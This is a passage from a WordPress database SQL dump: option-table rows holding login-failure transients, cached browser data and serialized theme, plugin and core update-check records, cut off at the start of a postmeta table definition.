(121138, '_transient_wflginfl_585330554', '1', 'no'),
(120771, '_transient_timeout_wflginfl_1293927825', '1500108819', 'no'),
(120772, '_transient_wflginfl_1293927825', '1', 'no'),
(120773, '_transient_timeout_wflginfl_1978994662', '1500109430', 'no'),
(120774, '_transient_wflginfl_1978994662', '2', 'no'),
(120775, '_transient_timeout_wflginfl_835573799', '1500110341', 'no'),
(120776, '_transient_wflginfl_835573799', '1', 'no'),
(120780, '_transient_timeout_wflginfl_1088887350', '1500111477', 'no'),
(120781, '_transient_wflginfl_1088887350', '2', 'no'),
(120789, '_transient_timeout_wflginfl_873965049', '1500114325', 'no'),
(120790, '_transient_wflginfl_873965049', '1', 'no'),
(120794, '_transient_timeout_wflginfl_780580991', '1500115090', 'no'),
(120795, '_transient_wflginfl_780580991', '2', 'no'),
(120796, '_transient_timeout_wflginfl_2036559243', '1500115434', 'no'),
(120797, '_transient_wflginfl_2036559243', '2', 'no'),
(120798, '_transient_timeout_wflginfl_2982752697', '1500115710', 'no'),
(120799, '_transient_wflginfl_2982752697', '2', 'no'),
(120803, '_transient_timeout_wflginfl_1976044991', '1500120575', 'no'),
(120804, '_transient_wflginfl_1976044991', '1', 'no'),
(120805, '_transient_timeout_wflginfl_1297608708', '1500120798', 'no'),
(120806, '_transient_wflginfl_1297608708', '1', 'no'),
(120808, '_transient_timeout_wflginfl_2868764100', '1500123196', 'no'),
(120809, '_transient_wflginfl_2868764100', '2', 'no'),
(120810, '_transient_timeout_wflginfl_1571919792', '1500124263', 'no'),
(120811, '_transient_wflginfl_1571919792', '2', 'no'),
(121200, '_transient_timeout_wflginfl_874893407', '1500311509', 'no'),
(121201, '_transient_wflginfl_874893407', '1', 'no'),
(120822, '_transient_timeout_wflginfl_1490298005', '1500130586', 'no'),
(120823, '_transient_wflginfl_1490298005', '2', 'no'),
(120826, '_transient_timeout_wflginfl_979684014', '1500130852', 'no'),
(120827, '_transient_wflginfl_979684014', '2', 'no'),
(120828, '_transient_timeout_wflginfl_1014463215', '1500131920', 'no'),
(120829, '_transient_wflginfl_1014463215', '2', 'no'),
(120830, '_transient_timeout_wflginfl_1498204623', '1500131999', 'no'),
(120831, '_transient_wflginfl_1498204623', '2', 'no'),
(120835, '_transient_timeout_wflginfl_1549060274', '1500134965', 'no'),
(120836, '_transient_wflginfl_1549060274', '2', 'no'),
(120845, '_transient_timeout_wflginfl_2631171529', '1500140999', 'no'),
(120846, '_transient_wflginfl_2631171529', '2', 'no'),
(120847, '_transient_timeout_wflginfl_1523870519', '1500141092', 'no'),
(120848, '_transient_wflginfl_1523870519', '2', 'no'),
(120849, '_transient_timeout_wflginfl_1342974510', '1500142965', 'no'),
(120850, '_transient_wflginfl_1342974510', '2', 'no'),
(120851, '_transient_timeout_wflginfl_1336393587', '1500143274', 'no'),
(120852, '_transient_wflginfl_1336393587', '2', 'no'),
(120858, '_transient_timeout_wflginfl_1604693571', '1500144455', 'no'),
(120859, '_transient_wflginfl_1604693571', '2', 'no'),
(120860, '_transient_timeout_wflginfl_2374503378', '1500146119', 'no'),
(120861, '_transient_wflginfl_2374503378', '2', 'no'),
(120862, '_transient_timeout_wflginfl_3013207725', '1500146939', 'no'),
(120863, '_transient_wflginfl_3013207725', '2', 'no'),
(120867, '_transient_timeout_wflginfl_779452982', '1500147789', 'no'),
(120868, '_transient_wflginfl_779452982', '2', 'no'),
(120874, '_transient_timeout_wflginfl_3318663778', '1500152677', 'no'),
(120870, '_transient_timeout_wflginfl_2991933812', '1500150273', 'no'),
(120871, '_transient_wflginfl_2991933812', '2', 'no'),
(120875, '_transient_wflginfl_3318663778', '2', 'no'),
(120876, '_transient_timeout_wflginfl_1781789324', '1500153504', 'no'),
(120877, '_transient_wflginfl_1781789324', '2', 'no'),
(120880, '_transient_timeout_wflginfl_657224322', '1500153778', 'no'),
(120881, '_transient_wflginfl_657224322', '2', 'no'),
(120885, '_transient_timeout_wflginfl_1976112628', '1500155669', 'no'),
(120886, '_transient_wflginfl_1976112628', '2', 'no'),
(120896, '_transient_timeout_wflginfl_1549272919', '1500162959', 'no'),
(120897, '_transient_wflginfl_1549272919', '2', 'no'),
(120901, '_transient_timeout_wflginfl_585291184', '1500166433', 'no'),
(120902, '_transient_wflginfl_585291184', '1', 'no'),
(120903, '_transient_timeout_wflginfl_2332422595', '1500166500', 'no'),
(120904, '_transient_wflginfl_2332422595', '2', 'no'),
(120908, '_transient_timeout_wflginfl_3583325039', '1500170085', 'no'),
(120909, '_transient_wflginfl_3583325039', '2', 'no'),
(120910, '_transient_timeout_wflginfl_2588110632', '1500171233', 'no'),
(120911, '_transient_wflginfl_2588110632', '2', 'no'),
(120915, '_transient_timeout_wflginfl_3319954936', '1500174851', 'no'),
(120916, '_transient_wflginfl_3319954936', '1', 'no'),
(120918, '_transient_timeout_wflginfl_2050341734', '1500177032', 'no'),
(120919, '_transient_wflginfl_2050341734', '2', 'no'),
(120922, '_transient_timeout_wflginfl_911901410', '1500179149', 'no'),
(120923, '_transient_wflginfl_911901410', '1', 'no'),
(120927, '_transient_timeout_wflginfl_3042655538', '1500184305', 'no'),
(120928, '_transient_wflginfl_3042655538', '1', 'no'),
(120929, '_transient_timeout_wflginfl_2982214495', '1500186537', 'no'),
(120930, '_transient_wflginfl_2982214495', '2', 'no'),
(120934, '_transient_timeout_wflginfl_3361094801', '1500193201', 'no'),
(120935, '_transient_wflginfl_3361094801', '1', 'no'),
(120941, '_transient_timeout_wflginfl_1678835878', '1500196116', 'no'),
(120942, '_transient_wflginfl_1678835878', '1', 'no'),
(120958, '_transient_timeout_wflginfl_2315261990', '1500201581', 'no'),
(120945, '_transient_timeout_wflginfl_1744517895', '1500199947', 'no'),
(120946, '_transient_wflginfl_1744517895', '1', 'no'),
(120952, '_transient_wflginfl_1729003577', '2', 'no'),
(120951, '_transient_timeout_wflginfl_1729003577', '1500201118', 'no'),
(120959, '_transient_wflginfl_2315261990', '2', 'no'),
(120960, '_transient_timeout_wflginfl_1034942322', '1500203094', 'no'),
(120961, '_transient_wflginfl_1034942322', '2', 'no'),
(120962, '_transient_timeout_wflginfl_984866374', '1500203165', 'no'),
(120963, '_transient_wflginfl_984866374', '2', 'no'),
(120965, '_transient_timeout_wflginfl_1743437059', '1500204812', 'no'),
(120966, '_transient_wflginfl_1743437059', '2', 'no'),
(120967, '_transient_timeout_wflginfl_1384349292', '1500205317', 'no'),
(120968, '_transient_wflginfl_1384349292', '2', 'no'),
(120971, '_site_transient_timeout_browser_cc75d7392f9d8bd819fbfacf05f70081', '1500796572', 'yes'),
(120972, '_site_transient_browser_cc75d7392f9d8bd819fbfacf05f70081', 'a:9:{s:8:\"platform\";s:7:\"Windows\";s:4:\"name\";s:7:\"Firefox\";s:7:\"version\";s:4:\"54.0\";s:10:\"update_url\";s:23:\"http://www.firefox.com/\";s:7:\"img_src\";s:50:\"http://s.wordpress.org/images/browsers/firefox.png\";s:11:\"img_src_ssl\";s:49:\"https://wordpress.org/images/browsers/firefox.png\";s:15:\"current_version\";s:2:\"16\";s:7:\"upgrade\";b:0;s:8:\"insecure\";b:0;}', 'yes'),
(124429, '_site_transient_update_themes', 'O:8:\"stdClass\":4:{s:12:\"last_checked\";i:1566834223;s:7:\"checked\";a:4:{s:6:\"figero\";s:5:\"1.5.1\";s:12:\"twentyeleven\";s:3:\"1.5\";s:14:\"twentythirteen\";s:3:\"1.1\";s:12:\"twentytwelve\";s:3:\"1.1\";}s:8:\"response\";a:4:{s:6:\"figero\";a:6:{s:5:\"theme\";s:6:\"figero\";s:11:\"new_version\";s:5:\"1.6.5\";s:3:\"url\";s:36:\"https://wordpress.org/themes/figero/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/figero.1.6.5.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:12:\"twentyeleven\";a:6:{s:5:\"theme\";s:12:\"twentyeleven\";s:11:\"new_version\";s:3:\"3.3\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentyeleven/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentyeleven.3.3.zip\";s:8:\"requires\";s:3:\"3.2\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:14:\"twentythirteen\";a:6:{s:5:\"theme\";s:14:\"twentythirteen\";s:11:\"new_version\";s:3:\"2.9\";s:3:\"url\";s:44:\"https://wordpress.org/themes/twentythirteen/\";s:7:\"package\";s:60:\"https://downloads.wordpress.org/theme/twentythirteen.2.9.zip\";s:8:\"requires\";s:3:\"3.6\";s:12:\"requires_php\";s:5:\"5.2.4\";}s:12:\"twentytwelve\";a:6:{s:5:\"theme\";s:12:\"twentytwelve\";s:11:\"new_version\";s:3:\"3.0\";s:3:\"url\";s:42:\"https://wordpress.org/themes/twentytwelve/\";s:7:\"package\";s:58:\"https://downloads.wordpress.org/theme/twentytwelve.3.0.zip\";s:8:\"requires\";s:3:\"3.5\";s:12:\"requires_php\";s:5:\"5.2.4\";}}s:12:\"translations\";a:0:{}}', 'yes'),
(124430, '_site_transient_update_plugins', 'O:8:\"stdClass\":3:{s:12:\"last_checked\";i:1566834223;s:8:\"response\";a:4:{s:35:\"display-widgets/display-widgets.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:29:\"w.org/plugins/display-widgets\";s:4:\"slug\";s:15:\"display-widgets\";s:6:\"plugin\";s:35:\"display-widgets/display-widgets.php\";s:11:\"new_version\";s:3:\"2.7\";s:3:\"url\";s:46:\"https://wordpress.org/plugins/display-widgets/\";s:7:\"package\";s:62:\"https://downloads.wordpress.org/plugin/display-widgets.2.7.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:66:\"https://s.w.org/plugins/geopattern-icon/display-widgets_f8f8f8.svg\";}s:7:\"banners\";a:0:{}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:164:\"<p>This reverts all changes added by the 2.6 versions. This version is identical to version 2.05. Please upgrade immediately to remove code from the 2.6 series.</p>\";s:6:\"tested\";s:6:\"4.3.16\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:43:\"google-analyticator/google-analyticator.php\";O:8:\"stdClass\":13:{s:2:\"id\";s:33:\"w.org/plugins/google-analyticator\";s:4:\"slug\";s:19:\"google-analyticator\";s:6:\"plugin\";s:43:\"google-analyticator/google-analyticator.php\";s:11:\"new_version\";s:5:\"6.5.4\";s:3:\"url\";s:50:\"https://wordpress.org/plugins/google-analyticator/\";s:7:\"package\";s:68:\"https://downloads.wordpress.org/plugin/google-analyticator.6.5.4.zip\";s:5:\"icons\";a:1:{s:2:\"1x\";s:72:\"https://ps.w.org/google-analyticator/assets/icon-128x128.png?rev=1160827\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:74:\"https://ps.w.org/google-analyticator/assets/banner-772x250.jpg?rev=1165890\";}s:11:\"banners_rtl\";a:0:{}s:14:\"upgrade_notice\";s:117:\"<ul>\n<li>Fix depricated API field name calls.</li>\n<li>Check for is_preview() in ga_external_tracking_js()</li>\n</ul>\";s:6:\"tested\";s:3:\"5.1\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:31:\"slideshow-manager/slideshow.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:31:\"w.org/plugins/slideshow-manager\";s:4:\"slug\";s:17:\"slideshow-manager\";s:6:\"plugin\";s:31:\"slideshow-manager/slideshow.php\";s:11:\"new_version\";s:5:\"2.1.3\";s:3:\"url\";s:48:\"https://wordpress.org/plugins/slideshow-manager/\";s:7:\"package\";s:66:\"https://downloads.wordpress.org/plugin/slideshow-manager.2.1.3.zip\";s:5:\"icons\";a:1:{s:7:\"default\";s:68:\"https://s.w.org/plugins/geopattern-icon/slideshow-manager_e9e9e9.svg\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:71:\"https://ps.w.org/slideshow-manager/assets/banner-772x250.jpg?rev=631816\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:6:\"3.7.26\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}s:37:\"widgets-on-pages/widgets_on_pages.php\";O:8:\"stdClass\":12:{s:2:\"id\";s:30:\"w.org/plugins/widgets-on-pages\";s:4:\"slug\";s:16:\"widgets-on-pages\";s:6:\"plugin\";s:37:\"widgets-on-pages/widgets_on_pages.php\";s:11:\"new_version\";s:5:\"1.4.0\";s:3:\"url\";s:47:\"https://wordpress.org/plugins/widgets-on-pages/\";s:7:\"package\";s:63:\"https://downloads.wordpress.org/plugin/widgets-on-pages.1.4.zip\";s:5:\"icons\";a:3:{s:2:\"2x\";s:69:\"https://ps.w.org/widgets-on-pages/assets/icon-256x256.png?rev=1397931\";s:2:\"1x\";s:61:\"https://ps.w.org/widgets-on-pages/assets/icon.svg?rev=1400727\";s:3:\"svg\";s:61:\"https://ps.w.org/widgets-on-pages/assets/icon.svg?rev=1400727\";}s:7:\"banners\";a:1:{s:2:\"1x\";s:70:\"https://ps.w.org/widgets-on-pages/assets/banner-772x250.png?rev=478725\";}s:11:\"banners_rtl\";a:0:{}s:6:\"tested\";s:5:\"4.9.5\";s:12:\"requires_php\";b:0;s:13:\"compatibility\";a:0:{}}}s:12:\"translations\";a:0:{}}', 'yes'),
(124407, '_transient_doing_cron', '1566834220.2415370941162109375000', 'yes'),
(123522, '_site_transient_update_core', 'O:8:\"stdClass\":4:{s:7:\"updates\";a:18:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.2.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.2\";s:7:\"version\";s:5:\"5.2.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.2.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.2.2-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.2\";s:7:\"version\";s:5:\"5.2.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:2;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.2.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.2.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.2.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.2.1\";s:7:\"version\";s:5:\"5.2.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:3;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.2.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-5.2.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-5.2-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-5.2-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:3:\"5.2\";s:7:\"version\";s:3:\"5.2\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:4;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.1.1-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.1.1\";s:7:\"version\";s:5:\"5.1.1\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:5;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.4.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.0.4.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.0.4-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.0.4-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"5.0.4\";s:7:\"version\";s:5:\"5.0.4\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:6;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.10.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.9.10.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.9.10-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.9.10-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.9.10\";s:7:\"version\";s:6:\"4.9.10\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:7;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.8.9.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-4.8.9.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-4.8.9-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.8.9-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:5:\"4.8.9\";s:7:\"version\";s:5:\"4.8.9\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:8;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.7.13.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.7.13.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.7.13-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.7.13-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.7.13\";s:7:\"version\";s:6:\"4.7.13\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:9;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.6.14.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.6.14.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.6.14-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.6.14-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.6.14\";s:7:\"version\";s:6:\"4.6.14\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:10;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.5.17.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.5.17.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.5.17-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.5.17-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.5.17\";s:7:\"version\";s:6:\"4.5.17\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:11;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.4.18.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.4.18.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.4.18-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.4.18-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.4.18\";s:7:\"version\";s:6:\"4.4.18\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:12;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.3.19.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.3.19.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.3.19-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.3.19-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.3.19\";s:7:\"version\";s:6:\"4.3.19\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:13;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.2.23.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.2.23.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.2.23-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.2.23-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.2.23\";s:7:\"version\";s:6:\"4.2.23\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:14;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.26.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.1.26.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.1.26-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.1.26-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.1.26\";s:7:\"version\";s:6:\"4.1.26\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:15;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.0.26.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-4.0.26.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-4.0.26-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-4.0.26-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"4.0.26\";s:7:\"version\";s:6:\"4.0.26\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:16;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-3.9.27.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-3.9.27.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-3.9.27-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-3.9.27-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"3.9.27\";s:7:\"version\";s:6:\"3.9.27\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}i:17;O:8:\"stdClass\":10:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:60:\"https://downloads.wordpress.org/release/wordpress-3.8.29.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:60:\"https://downloads.wordpress.org/release/wordpress-3.8.29.zip\";s:10:\"no_content\";s:71:\"https://downloads.wordpress.org/release/wordpress-3.8.29-no-content.zip\";s:11:\"new_bundled\";s:72:\"https://downloads.wordpress.org/release/wordpress-3.8.29-new-bundled.zip\";s:7:\"partial\";b:0;s:8:\"rollback\";b:0;}s:7:\"current\";s:6:\"3.8.29\";s:7:\"version\";s:6:\"3.8.29\";s:11:\"php_version\";s:5:\"5.2.4\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"5.0\";s:15:\"partial_version\";s:0:\"\";}}s:12:\"last_checked\";i:1566834222;s:15:\"version_checked\";s:6:\"3.7.29\";s:12:\"translations\";a:0:{}}', 'yes');

-- --------------------------------------------------------

--
-- Structure de la table `www2_postmeta`
--

CREATE TABLE `www2_postmeta` (
  `meta_id` bigint(20) UNSIGNED NOT NULL,
